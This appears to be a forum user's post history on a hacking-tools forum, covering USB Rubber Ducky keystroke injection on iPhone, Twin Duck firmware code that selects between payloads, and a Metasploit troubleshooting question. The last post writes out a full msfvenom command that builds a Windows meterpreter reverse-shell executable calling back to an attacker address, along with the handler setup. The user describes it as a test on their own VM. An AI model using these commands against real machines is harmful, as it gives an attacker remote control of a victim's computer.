Jump to content

aideux

Active Members
 View Profile  See their activity

  • Posts

    10

  • Joined

 Content Type 

Posts posted by aideux

    Does keystroke injection work on iPhone?

    in Classic USB Rubber Ducky

    Posted

    On 7/28/2018 at 9:31 PM, MB60893 said:

    I do not off the top of my head. I know that such commands are possible with a bluetooth keyboard (such as the Logitech bluetooth keyboards for iPad, which you can press combinations of buttons for using the "command" key and letters on the keyboard, which would work I assume by using the "GUI" button syntax for the USB rubber ducky/Bash Bunny.)

    So I was able to get the injection working, but can't seem to find the commands for interacting with the touchscreen via a keyboard.

    Does keystroke injection work on iPhone?

    in Classic USB Rubber Ducky

    Posted

    1 hour ago, MB60893 said:

    I do not off the top of my head. I know that such commands are possible with a bluetooth keyboard (such as the Logitech bluetooth keyboards for iPad, which you can press combinations of buttons for using the "command" key and letters on the keyboard, which would work I assume by using the "GUI" button syntax for the USB rubber ducky/Bash Bunny.)

    Hmmm, I'll give it a shot, and post back what I find! Thanks for the tip!

    Does keystroke injection work on iPhone?

    in Classic USB Rubber Ducky

    Posted

    8 hours ago, MB60893 said:

    You would need a lightning adapter for most modern iPhones, the only caveat being that any accessory plugged into an iOS device prompts whether or not you wish to "Trust" the device that is connected to your phone. Permitting you know the passcode and are able to press "Trust", go for it. ^_^

     

    Do you know what the syntax is for the touchscreen (swiping left, right; tapping, etc.)?

    Twin Ducks two payloads process?

    in Suggestions / Bug reports

    Posted

    1 hour ago, Just_a_User said:

    its in here ?

    https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Firmware/Source/Composite_Duck - Multi/src/main.c

    Maybe its always GPIO button but payload1 if caps on and payload2 if not?

    Hm I see that. Looks like it is "inject.bin" and "inject2.bin". Also, num lock would affect payload 1 and caps would initiate payload 2? This block of code makes me think that: 

      

    void ui_kbd_led(uint8_t value)
{
	if(!in_affect){
		//this is called when LEDs CAPS LCK, NUM LCK change
		if (value & HID_LED_NUM_LOCK) {
			// Here, turn on Num LED
			LED_On( LED1 );
			in_affect=true;
			//use injectarray
			state = state_START_INJECT;
		} else{
			// Here, turn off Num LED
			LED_Off( LED1 );
		}
		if (value & HID_LED_CAPS_LOCK) {
			// Here, turn on CAPS LED
			LED_On( LED0 );
			in_affect=true;
			//use injectarray2
			for (int c=0;c<(sizeof(inject_array2));c++){
				inject_array[c]=inject_array2[c];
			}
			state = state_START_INJECT;
		} else{
			// Here, turn off CAPS LED
			LED_Off( LED0 );
		}
	}
}

    I haven't written in C in a while, though, so I'm not sure if injectarray = inject.bin / injectarray2 = inject2.bin. Can anyone confirm? 

     

    Also, does the key (caps lock or num lock) need to be active for the payload to work, or does one put the ducky in first, and then press the corresponding button? I'm not with it right now, or I would test this, but I'd love to know from someone more knowledgeable.

    Twin Ducks two payloads process?

    in Suggestions / Bug reports

    Posted

    3 hours ago, Just_a_User said:

    Im not sure thats the case, i think its payload one when cps/num/scroll lock are pressed and GPIO button for payload two? I think the term twin duck refers more to Storage and Payload. Maybe im wrong someone will correct me. but its worth searching the forums for more info - like the below

     

    What do I need to name the payloads, and is the setup any different, or is it like “inject.bin” and “inject2.bin”. Thanks :)

    Twin Ducks two payloads process?

    in Suggestions / Bug reports

    Posted

    I understand how to script payloads and write them to the Ducky, but I'm a little confused as to how to get the two payloads working using Twin Ducks. I understand that one payload would be executed when Caps Lock is active and the Ducky is inserted, while the other would work when Num Lock is active before the Ducky is inserted, but I'm unsure as to how to get the Ducky to differentiate between the two payloads. I'm assuming there are two inject.bin files that are named differently, but I would love if someone could explain this process a little further for me, as I can't seem to find any Twin Ducks documentation anywhere. Thank you!

     

    P.S. Already posted this in the Ducky GitHub, but it doesn't really look like the "Issues" tab gets much activity, so I thought I'd post here too. Just for anyone wondering why I didn't start there.

    Meterpreter console not opening

    in Hacks & Mods

    Posted

    For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code:

    msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe

    Then, in the metasploit console, I type:

    use multi/handler

    set payload windows/meterpreter_reverse_tcp

    set LHOST [attacker IP address]

    set LPORT 5555

    exploit

    Then, a session is opened, but the line that looks like "meterpreter>" does not open.

    I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own windows 10 VM. Can someone please help me out? I am new to using metasploit, and would love some advice.

×
×
  • Create New...